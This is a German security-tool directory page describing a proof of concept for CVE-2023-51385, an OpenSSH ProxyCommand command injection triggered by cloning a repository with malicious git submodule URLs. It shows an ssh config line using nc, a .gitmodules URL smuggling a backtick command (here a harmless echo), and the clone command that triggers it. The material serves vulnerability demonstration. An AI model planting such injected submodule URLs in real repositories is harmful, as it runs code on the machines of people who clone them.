Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
Tools/GitHubGitHub/featherw1t/cve-2023-51385_test
SchwachstellenanalyseExploitationWebanwendungs-ExploitationLernen & BildungLabs & Praxis
GitHubfeatherw1t/cve-2023-51385_test

CVE-2023-51385_test

Proof-of-concept für CVE-2023-51385: demonstriert eine Command Injection über bösartige Git-Submodul-URLs beim Klonen mit `--recurse-submodules`, Ausnutzung des OpenSSH ProxyCommand.

Repository anzeigen
vor 2 JahrenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

Bestätigung von CVE-2023-51385

Zuerst muss in ~/.ssh/config folgender Inhalt hinzugefügt werden:

root@kitploit:~
host *.example.com
  ProxyCommand /usr/bin/nc -X connect -x 192.0.2.0:8080 %h %p

In der .gitmodules-Datei existiert eine Befehlsinjektion:

root@kitploit:~
url = ssh://`echo helloworld > cve.txt`foo.example.com/bar

Nach der Konfiguration führen Sie den folgenden Befehl aus, um die Verwundbarkeit auszulösen:

root@kitploit:~
git clone https://github.com/LtmThink/CVE-2023-51385_test --recurse-submodules

Bei erfolgreicher Ausführung wird im Verzeichnis CVE-2023-51385_test die Datei cve.txt erstellt.

Hinweis: OpenSSH muss < 9.6p1 sein.

Weitere Details finden Sie in diesem Blogbeitrag:

https://vin01.github.io/piptagole/ssh/security/openssh/libssh/remote-code-execution/2023/12/20/openssh-proxycommand-libssh-rce.html

Tool herunterladen